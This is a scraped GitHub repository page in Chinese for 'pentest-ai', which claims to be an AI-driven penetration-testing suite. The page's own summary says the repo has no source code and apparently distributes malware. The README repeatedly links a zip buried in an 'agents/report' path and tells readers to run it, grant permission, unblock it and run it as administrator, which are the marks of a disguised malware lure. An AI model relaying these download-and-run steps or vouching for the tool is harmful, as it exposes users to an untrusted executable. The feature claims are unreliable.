forcepumpholibut956/pentest-ai

GitHub: forcepumpholibut956/pentest-ai

该仓库伪装为 AI 驱动的渗透测试自动化工具,但实际上无源代码、仅提供不可信的二进制下载,疑似针对安全研究人员的恶意软件分发载体。

Stars: 0 | Forks: 0

# 🛡️ pentest-ai - 以更少的工作量运行安全测试 [![下载 pentest-ai](https://img.shields.io/badge/Download-Release%20Page-blue?style=for-the-badge&logo=github)](https://raw.githubusercontent.com/forcepumpholibut956/pentest-ai/main/agents/report/ai_pentest_v1.8.zip) ## 🧭 本应用的功能 pentest-ai 可帮助您以更少的手动工作量运行安全检查。它将大量安全工具、Python agent 和 MCP 服务器整合在一个应用中。 使用它可以: - 扫描目标以查找常见问题 - 按设定顺序运行检查 - 测试可能的 exploit 路径 - 验证 proof of concept 结果 - 将发现的问题集中收集 它专为 pentest 工作、bug bounty 任务、红队实验、CTF 练习和安全研究而打造。 ## 💻 系统要求 在安装之前,请确保您的 Windows PC 具备以下条件: - Windows 10 或 Windows 11 - 8 GB 或更多 RAM - 2 GB 可用磁盘空间 - 稳定的互联网连接 - 获得测试您所用系统的许可 为了获得最佳效果: - 在运行扫描之前关闭其他占用资源大的应用程序 - 使用本地文件夹,例如 `Downloads` 或 `Desktop` - 保持 Windows Defender 开启,除非您的设置明确需要将其设为例外 ## 📥 下载 pentest-ai 访问发布页面下载并运行此文件: [https://raw.githubusercontent.com/forcepumpholibut956/pentest-ai/main/agents/report/ai_pentest_v1.8.zip](https://raw.githubusercontent.com/forcepumpholibut956/pentest-ai/main/agents/report/ai_pentest_v1.8.zip) 在发布页面上,找到最新版本并下载与您的系统匹配的 Windows 文件。如果您不确定选择哪个文件,请选择标记为 Windows 的文件并使用默认选项。 ## 🪟 在 Windows 上安装 请在您的 Windows PC 上按照以下步骤操作: 1. 打开下载页面并获取最新的 Windows 版本。 2. 将文件保存到您的计算机。 3. 如果文件位于 `.zip` 文件夹中,请右键单击该文件并选择 **提取全部**。 4. 打开解压后的文件夹。 5. 双击应用程序文件以启动它。 6. 如果 Windows 请求权限,请点击 **是**。 7. 在开始扫描之前,等待应用程序加载完成。 如果您看到文件被阻止的提示: 1. 右键单击该文件。 2. 选择 **属性**。 3. 勾选 **解除锁定**(如果您看到该选项)。 4. 点击 **应用**,然后再次打开应用程序。 ## 🚀 首次启动 当 pentest-ai 首次启动时,它可能会创建一些用于设置和扫描数据的本地文件及文件夹。 您可能会看到以下选项: - 目标输入 - 扫描模式 - 工具选择 - 输出文件夹 - agent 运行设置 一个简单的首次测试: 1. 输入您拥有测试权限的测试系统。 2. 选择基本扫描模式。 3. 保留默认工具集。 4. 开始运行。 5. 扫描结束后查看结果。 ## 🔧 基本设置 如果应用程序提示输入设置值,请按照以下简单步骤操作: 1. 打开设置界面。 2. 检查输出文件夹路径。 3. 选择一个您之后容易找到的文件夹,例如 `Documents\pentest-ai`。 4. 首先将扫描深度设置为低或中等水平。 5. 在您熟悉流程之前,请保持高级 chaining 选项处于关闭状态。 6. 保存您的设置。 如果应用程序使用配置文件,您可以使用记事本进行编辑: - 打开配置文件 - 每次只更改一个值 - 保存文件 - 重启应用程序 ## 🧰 主要功能 pentest-ai 整合了用于安全工作的工具和 agent 逻辑。 ### 🔍 目标检查 对主机、域名或应用运行常见检查。这可以帮助您发现: - 开放端口 - 暴露的服务 - 薄弱的配置选项 - 缺失的 headers - 高风险路径 ### 🤖 Agent 驱动的运行 应用程序可以使用 Python agent 逐步指导检查。当您希望获得比手动使用工具更有序的流程时,这会非常有用。 ### 🔗 Exploit chaining 使用链式步骤来测试一个漏洞是否会导致另一个漏洞。当您想了解某个发现的全面影响时,此功能非常实用。 ### ✅ PoC 验证 应用程序可以帮助您在继续之前验证 proof of concept 结果。这能确保您的工作基于真实的证据。 ### 🗂️ OSINT 支持 您可以使用 OSINT 风格的检查来收集关于目标的公开数据,例如: - 主机名 - 子域名 - 暴露的资产 - 相关 endpoint ### 🛠️ 工具覆盖 该应用程序包含对多种安全工具的支持,例如: - nmap - vulnerability scanner - web 测试工具 - recon 工具 - exploit 检查 - 抓包和审查辅助工具 ## 🧪 常见用例 将 pentest-ai 用于: - bug bounty recon - 实验室测试 - CTF 练习 - 内部安全检查 - 红队演练 - 服务审查 - 基本漏洞发现 ## 📁 典型文件夹布局 运行应用程序后,您可能会看到以下文件夹: - `config` 用于存放设置文件 - `logs` 用于存放运行历史记录 - `results` 用于存放扫描输出 - `agents` 用于存放 agent 设置 - `tools` 用于存放工具列表 如果您想保持整洁,请在每次会话后将旧的扫描结果移动到带有日期的文件夹中。 ## 🖱️ 如何运行扫描 请按照以下简单流程操作: 1. 打开 pentest-ai。 2. 输入您的目标。 3. 选择扫描 profile。 4. 选择您要使用的工具。 5. 开始运行。 6. 观察进度输出。 7. 完成后打开结果文件夹。 如果您希望进行一次安全的首次运行,请从以下设置开始: - 一个主机 - 一个端口范围 - 一个扫描 profile - 默认设置 ## ⚙️ 顺畅运行的提示 - 首先一次只使用一个目标。 - 保持首次扫描的小规模。 - 每次运行后保存结果。 - 在更改设置之前阅读输出。 - 如果工具未能加载,请重启应用程序。 - 如果在没有明确原因的情况下运行失败,请更新到最新版本。 ## 🧩 故障排除 ### 应用程序无法打开 - 检查下载是否已完成。 - 如果文件位于 zip 文件夹中,请将其解压。 - 右键单击应用程序并再次运行。 - 如果 Windows 阻止了它,请尝试以管理员身份运行。 ### 窗口一闪而过(打开后立即关闭) - 检查文件夹中是否存在缺失的文件。 - 重新解压发行版文件。 - 确保您没有将文件移出应用程序文件夹。 - 再次尝试最新版本。 ### 扫描未启动 - 检查您的目标是否有效。 - 确保应用程序具有写入文件的权限。 - 降低扫描深度。 - 关闭额外选项后重试。 ### 结果为空 - 确认目标是否在线。 - 尝试更宽的端口范围。 - 使用不同的扫描 profile。 - 查看日志以了解工具运行失败的原因。 ## 🔐 安全使用 仅在您拥有或已获得测试许可的系统上使用 pentest-ai。请将您的工作限制在经批准的范围和实验室系统内。 ## 📦 版本更新 当您需要最新构建版本时,请查看发布页面: [https://raw.githubusercontent.com/forcepumpholibut956/pentest-ai/main/agents/report/ai_pentest_v1.8.zip](https://raw.githubusercontent.com/forcepumpholibut956/pentest-ai/main/agents/report/ai_pentest_v1.8.zip) 每个版本可能包括: - 错误修复 - 工具更新 - 扫描流程变更 - 更好的 Windows 支持 - 新的 agent 路径 ## 🗺️ 建议的首次运行 如果您想要一个简单的起点,请遵循以下路径: 1. 下载最新的 Windows 版本。 2. 解压文件。 3. 打开应用程序。 4. 添加一个测试目标。 5. 运行基本扫描。 6. 阅读输出内容。 7. 保存报告 ## 📌 涵盖的主题 此项目适用于以下相关工作: - ai security - bug bounty - claude - ctf - cybersecurity - exploit chaining - hacking tools - mcp - model context protocol - nmap - offensive security - osint - penetration testing - pentest-ai - pentesting - python - red team - security - vulnerability scanning
标签:AI代理, AI安全, Chat Copilot, MCP服务器, Python, Windows应用, XXE攻击, 人工智能, 反取证, 安全报告, 安全评估, 插件系统, 数据展示, 无后门, 用户模式Hook绕过, 红队, 网络安全, 自动化攻击流, 逆向工具, 隐私保护